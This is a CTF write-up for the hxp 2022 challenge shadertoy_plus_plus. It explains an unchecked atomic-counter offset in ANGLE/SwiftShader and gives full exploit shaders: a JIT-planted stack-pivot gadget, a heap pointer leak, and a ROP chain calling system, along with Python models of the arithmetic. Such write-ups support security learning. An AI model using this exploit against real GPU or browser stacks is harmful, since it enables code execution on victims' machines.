hxp CTF 2022: shadertoy_plus_plus

Who doesn’t love shadertoy? https://www.shadertoy.com/view/cdG3WW

Teams are given a ShaderToy-like service that accepts GLES3.1 compute shaders. Players need to find a “0day” in the two main libraries, Google’s ANGLE and SwiftShader, and exploit it to pop a shell.

Warning: This is going to be a somewhat superficial look into ANGLE and SwiftShader.

The challenge uses ANGLE to implement GLES3.1 and SwiftShader to emulate shaders on the CPU. This setup is not much different from how WebGL is implemented in some browsers, and it has previously been shown to be an attack vector against browsers. The service does very little: it sets up a context, creates a texture to render to, provides a source of entropy (time), takes four shaders, renders them, converts the results to PNG using fpng and finally sends them back as base64-encoded data. When creating the EGL context, the service requests EGL_CONTEXT_OPENGL_ROBUST_ACCESS_EXT, which adds validation of accesses in GPU programs and APIs.

The ANGLE and SwiftShader projects are admittedly large, but players were not expected to read through all of the code, and we had prepared a series of hints:

Hint 1: If it were about WebGL, we wouldn't have made a challenge. It's GL ES 3.1 with a WebGL Compatibility Context.
Hint 2: I wonder, is the context really _robust_?
Hint 3: Do we actually sanitize all accesses when implementing robustness?

Seven hours into the CTF somebody already had an arbitrary read/write primitive, so we held off on sharing the hints.

At a high level, the projects operate in the following way:

  • ANGLE receives API calls, validates them according to the GLES spec and dispatches to the respective backend (GL, VK, DX) as needed (e.g. when state is out of sync).
  • The backend here is the Vulkan layer in ANGLE which will translate the calls to the VK API and invoke the Vulkan API implementation, in this case SwiftShader.
  • To support shaders for all different shading languages (various GLSL versions, HLSL, SPIRV), ANGLE implements a transpiler which parses the shader and translates it to the target language.
  • The compiler implements a variety of transformation and validation passes to prevent program misuse, work around GPU bugs, deter invalid accesses, emulate functions and optimize code.
  • For our purpose, one key pass is the ClampIndirectIndices pass. This pass clamps dynamic array indices. Static out-of-bounds accesses are also sanitized at compile time.
  • After the passes are applied, the program is translated to SPIRV in OutputSPIRV.cpp.
  • SwiftShader takes the SPIRV, emits a JIT-ed ELF program, and loads it.
  • The SwiftShader context is also ROBUSTNESS-aware, so it does its own sanitization. For each type of access it selects one of several out-of-bounds behaviors: Nullify, RobustBufferAccess, UndefinedValue, UndefinedBehavior. UndefinedValue and UndefinedBehavior are not secure.
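
To make the clamping step concrete, here is a minimal Python model of what a pass like ClampIndirectIndices achieves for a dynamically indexed array. It is a conceptual sketch only: the function names are made up for illustration and this is not ANGLE's actual implementation.

```python
def clamp_index(index: int, length: int) -> int:
    """Force a dynamic index into the valid range [0, length - 1]."""
    return max(0, min(index, length - 1))


def read_dynamic(array: list, index: int):
    """Model of an array read after a clamping pass has rewritten it."""
    return array[clamp_index(index, len(array))]


data = [10, 20, 30]
in_bounds = read_dynamic(data, 1)    # index is left alone
too_large = read_dynamic(data, 7)    # clamped to the last element
negative = read_dynamic(data, -5)    # clamped to the first element
```

The point of the model is that the clamp only exists where the compiler sees an indexing expression. An access that is not expressed as an array index never goes through it.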

The shadertoy_plus_plus service only receives shaders, so this is the only attack vector: provide a crafted shader and exploit some bug in the chain. The attack surface of the compiler and shader runtime is huge: the transpiler may be buggy, there are many types of accesses and one of them may have been missed, the JIT may be buggy, and compiler passes may be incompatible or applied in the wrong order. Such a bug is all the more likely because WebGL does not expose GLES3.1, so that code is probably much less tested.

A feature new in GLES3.1 is atomic counters. To use them, the client allocates an “atomic” buffer and accesses it from the shader through the atomic builtins (atomicCounterIncrement, …) at a specific offset. The access is not an array access, but the shader can still specify a buffer offset using the offset layout qualifier. This design bypasses the ClampIndirectIndices pass from earlier, so access sanitization is left to SwiftShader. Interestingly, SwiftShader does not sanitize atomic accesses either.
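
The effect of an unchecked counter offset can be illustrated with a toy memory model in Python. Everything here (the ToyHeap class, the buffer sizes, the neighbouring value) is hypothetical and only stands in for "a small counter buffer with other heap data behind it"; it does not reproduce SwiftShader's code.

```python
import struct


class ToyHeap:
    """A flat byte array standing in for process heap memory."""

    def __init__(self, size: int):
        self.mem = bytearray(size)

    def atomic_increment(self, base: int, offset: int) -> int:
        """Increment the 32-bit value at base + offset and return the old value.

        Note what is missing: the offset is never compared against the
        size of the buffer that starts at `base`.
        """
        addr = base + offset
        (old,) = struct.unpack_from("<I", self.mem, addr)
        struct.pack_into("<I", self.mem, addr, (old + 1) & 0xFFFFFFFF)
        return old


heap = ToyHeap(64)
COUNTER_BUF_BASE = 0    # hypothetical: counter buffer occupies bytes 0..15
COUNTER_BUF_SIZE = 16
NEIGHBOUR = 32          # hypothetical: unrelated data living further up the heap
struct.pack_into("<I", heap.mem, NEIGHBOUR, 0x41414141)

# An "offset" larger than the buffer reads and modifies the neighbour.
old_value = heap.atomic_increment(COUNTER_BUF_BASE, offset=NEIGHBOUR)
(new_value,) = struct.unpack_from("<I", heap.mem, NEIGHBOUR)
```

In this model the returned old value is a read primitive and the increment is a write primitive, which is the shape of the bug described above.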

This compute shader will segfault:

#version 310 es
layout(local_size_x=1) in;
layout(binding = 5, offset = 0x7000000) uniform atomic_uint brk_a;
void main() {
       atomicCounterIncrement(brk_a);
}

This bug allows arbitrary reads and writes on the heap. The same is also possible via SSBOs and atomicExchange accesses, but I realized this too late. The bug is clearly exploitable; all that remains is writing the exploit.

I needed to send two shaders.

This one is mainly for creating a stack-pivoting gadget in executable memory (JIT): push rax; pop rsp; ret.

#version 310 es

// Mostly copied from https://gist.github.com/julien/d7e71b837392f5239c6553098b5cac0c

precision highp image2D;
precision highp uimage2D;

layout(local_size_x=1) in;

layout(location = 0) uniform float time;
layout(binding = 8, rgba8) uniform writeonly image2D img;

float ball(vec2 p, float fx, float fy, float ax, float ay) {
	vec2 r = vec2(p.x + sin(time * fx) * ax, p.y + cos(time * fy) * ay);
	return 0.09 / length(r);
}

float renderPixel(vec2 p) {
	float col = 0.0;
	col += ball(p, 2.0, 2.0, 0.1, 0.5);
	col += ball(p, 1.5, 2.5, 0.2, 0.3);
	col += ball(p, 1.5, 0.5, 0.6, 0.7);
	col += ball(p, 0.1, .5, 0.6, 0.7);
	col = max(mod(col, 0.4), min(col, 1.0));
	return col;
}

layout(std430, binding = 16) volatile buffer Scratch { uint sc[0x4000000u]; };

uint gadget() {
	// Having these in a function prevents ANGLE from statically catching the out-of-bounds access.
	// But still this introduces a good ROP gadget into the JIT-ed code.
	// Such a gadget is almost impossible to find in memory.
	// push rax; pop rsp; ret
	uint off = 0x30d714u;
	return off;
}

void main() {
	sc[gadget()] = 1u;
	ivec2 dim = imageSize(img);
	float ratio = float(dim.x) / float(dim.y);
	for (int i = 0; i < dim.x; i++) {
		for (int j = 0; j < dim.y; j++) {
			vec2 q = vec2(float(i), float(j)) / vec2(float(dim.x), float(dim.y));
			vec2 p = -1.0 + 2.0 * q;
			p.x *= ratio;
			imageStore(img, ivec2(i, j), vec4(renderPixel(p)));
		}
	}
}
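
One plausible reading of the constant 0x30d714, inferred from the numbers rather than confirmed from the JIT output: sc is an array of 4-byte uints, so a store to sc[0x30d714] needs the byte offset 0x30d714 * 4. If the JIT embeds that offset as a little-endian 32-bit immediate, its first three bytes are exactly the x86-64 encoding of push rax; pop rsp; ret. The Python sketch below only checks this arithmetic; the element size and the immediate encoding are assumptions.

```python
import struct

SC_INDEX = 0x30D714   # value returned by gadget() in the shader
ELEMENT_SIZE = 4      # assumption: sc[] holds 4-byte uints (std430 layout)

# Byte offset that a store to sc[SC_INDEX] has to use.
byte_offset = SC_INDEX * ELEMENT_SIZE

# Assumption: the JIT emits the offset as a little-endian 32-bit immediate.
immediate = struct.pack("<I", byte_offset)

# x86-64 encodings: push rax = 0x50, pop rsp = 0x5c, ret = 0xc3.
PUSH_RAX_POP_RSP_RET = bytes([0x50, 0x5C, 0xC3])
contains_gadget = immediate[:3] == PUSH_RAX_POP_RSP_RET
```

Under these assumptions the gadget bytes sit inside an ordinary instruction operand, which explains why the shader only has to perform the store, not care about the value it writes.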

This one is the actual exploit.

#version 310 es

layout(local_size_x=1) in;

precision highp uimage2D;

// 508,  validation layer
layout(binding = 3, offset = 0x8060) uniform atomic_uint leak[2];

layout(binding = 5, offset = 0x7000000) uniform atomic_uint brk_a;

layout(binding = 6, offset = 0x3b6d0) uniform atomic_uint leak_buf[2];

layout(binding = 8, r32ui) uniform writeonly uimage2D img;

layout(std430, binding = 16) volatile buffer Scratch { uint sc[0x4000000u]; };

void setValue(atomic_uint s, uint target) {
	uint current = atomicCounter(s);
	if (target < current) {
		for (uint i = target; i < current; ++i) {
			atomicCounterDecrement(s);
		}
	} else {
		for (uint i = current; i < target; ++i) {
			atomicCounterIncrement(s);
		}
	}
}

void brk() {
	atomicCounter(brk_a);
}

uint gadget() {
	// Having these in a function prevents ANGLE from statically catching the out-of-bounds access.
	// But still this introduces a good ROP gadget into the JIT-ed code.
	// Such a gadget is almost impossible to find in memory.

	// push rax; pop rsp; ret
	uint off = 0x30d714u;
	return off;
}

void addWithCarry(uint a_low, uint a_high, uint b_low, uint b_high, out uint out_low, out uint out_high) {
	uint carry = 0u;
	uint low = a_low + b_low;
	if (low < a_low || low < b_low) {
		carry = 1u;
	}
	uint high = a_high + b_high + carry;
	out_low = low;
	out_high = high;
}

void subWithCarry(uint a_low, uint a_high, uint b_low, uint b_high, out uint out_low, out uint out_high) {
	uint carry = 0u;
	uint low = usubBorrow(a_low, b_low, carry);
	uint high = a_high - b_high - carry;
	out_low = low;
	out_high = high;
}

void write_gadget(uint index, uint base_low, uint base_high, int delta) {
	uint low, high;
	if (delta < 0) {
		subWithCarry(base_low, base_high, uint(-delta), 0u, low, high);
	} else {
		addWithCarry(base_low, base_high, uint(delta), 0u, low, high);
	}
	uint off = index * 2u;
	imageStore(img, ivec2(off, 0), uvec4(low));
	imageStore(img, ivec2(off + 1u, 0), uvec4(high));
}

void create_gadget_for_stack_pivot() {
	sc[gadget()] = 0x1234u;
}

void prepare_rop_chain(uint target_low, uint target_high) {
	int delta_pop_rdi = -0xab496b;
	uint leak_low = atomicCounter(leak[0]);
	uint leak_high = atomicCounter(leak[1]);

	uint buf_low = target_low;
	uint buf_high = target_high;

	// just to offset the stack
	const int delta_pop_rdx_rbx = -0xa4e827;
	write_gadget(0u, leak_low, leak_high, delta_pop_rdx_rbx);

	// This must be the stack pivot gadget
	const int delta_to_gadget = -0x66aa58;
	write_gadget(2u, leak_low, leak_high, delta_to_gadget);

	// pop rdi to point to 'cat flag.txt'
	write_gadget(3u, leak_low, leak_high, delta_pop_rdi);

	// Write ptr to 'cat flag.txt'
	write_gadget(4u, buf_low, buf_high, 0xa08);

	// ret sled
	for (uint i = 5u; i < 0x13eu; ++i) {
		write_gadget(i, leak_low, leak_high, delta_pop_rdi + 1);
	}

	// Write ptr to system
	write_gadget(0x13eu, leak_low, leak_high, -0xa8dff0);

	// Write 'cat flag.txt'
	write_gadget(0x141u, 0x20746163u, 0x67616c66u, 0);
	write_gadget(0x142u, 0x7478742eu, 0u, 0);
}

void overwrite_call(uint target_low, uint target_high) {
	setValue(leak[0u], target_low);
	setValue(leak[1u], target_high);
}

void main() {
	// Write this for debugging purposes only.
	imageStore(img, ivec2(0, 0), uvec4(0xdeaddeadu));
	imageStore(img, ivec2(1, 0), uvec4(0x11223344u));

	// Write this to help form a pointer quickly.
	imageStore(img, ivec2(4, 0), uvec4(0x88888888u));
	imageStore(img, ivec2(5, 0), uvec4(0x0000007fu));

	uint target_low = atomicCounter(leak_buf[0]);
	uint target_high = atomicCounter(leak_buf[1]);

	// Create gadget for stack pivoting.
	create_gadget_for_stack_pivot();

	// Create rop chain to call system("cat flag.txt")
	prepare_rop_chain(target_low, target_high);

	// Trigger call to gadget to start rop chain.
	overwrite_call(target_low, target_high);
}
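
The shader has no 64-bit integers, so every pointer is carried as a low and a high 32-bit half, and write_gadget applies a signed delta to a leaked base. The Python model below mirrors addWithCarry, subWithCarry and the delta logic so the result can be compared against ordinary 64-bit arithmetic. The base addresses used in the checks are made-up values, not real leaks.

```python
MASK32 = 0xFFFFFFFF


def add_with_carry(a_low, a_high, b_low, b_high):
    """64-bit add on (low, high) halves, as in the shader's addWithCarry."""
    low = (a_low + b_low) & MASK32
    carry = 1 if low < a_low else 0          # wrapped around => carry out
    high = (a_high + b_high + carry) & MASK32
    return low, high


def sub_with_borrow(a_low, a_high, b_low, b_high):
    """64-bit subtract on halves, mirroring usubBorrow in subWithCarry."""
    borrow = 1 if a_low < b_low else 0
    low = (a_low - b_low) & MASK32
    high = (a_high - b_high - borrow) & MASK32
    return low, high


def apply_delta(base: int, delta: int) -> int:
    """Model of the address computed by write_gadget(base, delta)."""
    low, high = base & MASK32, base >> 32
    if delta < 0:
        low, high = sub_with_borrow(low, high, -delta, 0)
    else:
        low, high = add_with_carry(low, high, delta, 0)
    return (high << 32) | low


HYPOTHETICAL_LEAK = 0x00007F8812345678       # made-up library pointer
pop_rdi_addr = apply_delta(HYPOTHETICAL_LEAK, -0xAB496B)
```

The carry and borrow only matter when the low half wraps, which is rare for real leaks but would silently corrupt the high half if it were ignored.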

The exploit first writes some recognizable values to memory, which makes debugging easier when the exploit breaks after an update. It then reads a pointer at offset 0x3b6d0 from the buffer base; this pointer leaks the address of the img buffer. The call to create_gadget_for_stack_pivot is not strictly necessary, since the other shader already creates the gadget. The next step builds a ROP chain that prints the flag, and the last step overwrites the function pointer so that the call ends up in the push rax; pop rsp; ret gadget. The function pointer will be called on glFinish (I think).
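
The constants in prepare_rop_chain fit together as follows: each write_gadget call fills one 8-byte slot of the img buffer (two r32ui texels), so slot 0x141 sits at byte offset 0xa08, which is the delta used for the pointer loaded into rdi. The Python sketch below recomputes that offset and the words for the command string. The helper names are made up, and the pop rdi; ret encoding is an assumption about what the gadget at delta_pop_rdi looks like.

```python
import struct

SLOT_SIZE = 8  # one write_gadget() slot = two 32-bit texels


def slot_offset(index: int) -> int:
    """Byte offset of a ROP chain slot inside the img buffer."""
    return index * SLOT_SIZE


def pack_command(cmd: bytes) -> list:
    """Split a NUL-terminated command into (low, high) words, one pair per slot."""
    padded = cmd + b"\x00"
    padded += b"\x00" * (-len(padded) % SLOT_SIZE)
    return [struct.unpack_from("<II", padded, i)
            for i in range(0, len(padded), SLOT_SIZE)]


COMMAND_SLOT = 0x141
command_offset = slot_offset(COMMAND_SLOT)
command_words = pack_command(b"cat flag.txt")

# Assumption: the gadget at delta_pop_rdi is `pop rdi; ret`, encoded as 5f c3.
# Skipping its first byte leaves a bare `ret`, which is what the sled uses.
POP_RDI_RET = bytes([0x5F, 0xC3])
ret_only = POP_RDI_RET[1:]
```

The recomputed words match the two write_gadget calls at slots 0x141 and 0x142, and the zero high word of the second slot doubles as the string terminator.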

Flag is: hxp{aBs7r4k71oN_On3_2_AbsTr4kt10n_N_Ne3d_t0_v4l1d4t3_aLl_0f_th3M}